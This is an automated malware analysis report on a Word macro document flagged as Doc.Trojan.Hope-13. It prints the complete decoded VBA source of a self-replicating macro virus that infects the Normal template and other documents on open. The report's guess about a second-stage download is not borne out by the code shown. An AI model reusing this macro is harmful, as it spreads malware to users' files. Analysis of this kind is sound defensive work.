Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 410c1c8f5340c843…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 2000-03-24 23:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 612bdd51863a635b6348c86b553f0b4c
SHA-1: af9d55bc4389b8220f99addd0d474689d6c93d9c
SHA-256: 410c1c8f5340c843bbb1cb99f5d564c5b66dd3b4778d7acc20278f71cae2d522
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, including a Document_Open macro that runs when the document is opened. This macro is designed to modify the Normal template and potentially execute further malicious actions. The ClamAV detection 'Doc.Trojan.Hope-13' strongly suggests malicious intent, likely involving the download or execution of a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Hope-13 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Hope-13
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2583 bytes
SHA-256: dfadf63897f8c3c3a7784f33d2129fa54276d0ab88518df9e4310c5b243c4cab
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
Options.ConfirmConversions = True 
Options.SaveNormalPrompt = True 
Options.VirusProtection = True 
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
HD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
If Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines >= 1 Then
TD = Target.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Target.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
End If
If HD <> TD Then
If Target = ActiveDocument Then
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString HD
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.Saved = True
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.Saved = True
ElseIf Target = NormalTemplate Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString HD
NormalTemplate.Save
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.Saved = True
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.Saved = True
End If
ElseIf HD = TD Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.Saved = True
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.Saved = True
End If
End Sub
'Rachel Is A Hottie!